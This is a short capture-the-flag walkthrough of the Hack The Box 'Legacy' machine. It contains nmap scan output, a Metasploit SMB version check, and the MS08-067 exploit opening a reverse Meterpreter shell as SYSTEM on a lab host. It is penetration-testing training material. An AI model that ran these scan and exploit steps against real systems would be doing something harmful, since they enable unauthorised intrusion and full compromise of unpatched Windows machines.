# 0 - VPN into HTB from the Kali VM, not the hypervisor host machine.

# 1 - Port scan 
    sudo nmap -A -T4 -p- -oA nmap/legacy 10.10.10.4

        Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn?
445/tcp open  microsoft-ds Windows XP microsoft-ds
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.80%I=7%D=4/15%Time=5E9797ED%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized
Running: Microsoft Windows XP|7|2012, VMware Player
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, VMware Player virtual NAT device
Network Distance: 2 hops
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h28m51s, deviation: 2h07m16s, median: 4d22h58m51s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ea:9f (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2020-04-21T04:24:33+03:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.35 ms 192.168.159.2
2   0.23 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.58 seconds
winnie@kali:~/Documents/htb/boxes/legacy$


# 2 - SMB is a historically vulnerable service. Let's find out which version is Running
    mfsconsole
        search smb_version
            use auxiliary/scanner/smb/smb_version
            option
            set RHOSTS 10.10.10.4
            exploit              
                [+] 10.10.10.4:445        - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
                [*] 10.10.10.4:445        - Scanned 1 of 1 hosts (100% complete)
                [*] Auxiliary module execution completed

# 3 - Search google - exploit-db and rapid7 for WIN XP SP3 + SMB = we should find ms08-67.
# 4 - on MFSCONSOLE - search ms08
        use windows/smb/ms08_067_netapi
        set RHOSTS 10.10.10.4
        Set LHOST 10.10.14.51 (vpn tunnel interface)
        set LPORT 7777 (because God is King)
        exploit
            [*] Started reverse TCP handler on 10.10.14.51:7777
            [*] 10.10.10.4:445 - Automatically detecting the target...
            [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
            [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
            [*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
            [*] Sending stage (180291 bytes) to 10.10.10.4
            [*] Meterpreter session 1 opened (10.10.14.51:7777 -> 10.10.10.4:1042) at 2020-04-15 21:23:50 -0400
            meterpreter > getuid
            Server username: NT AUTHORITY\SYSTEM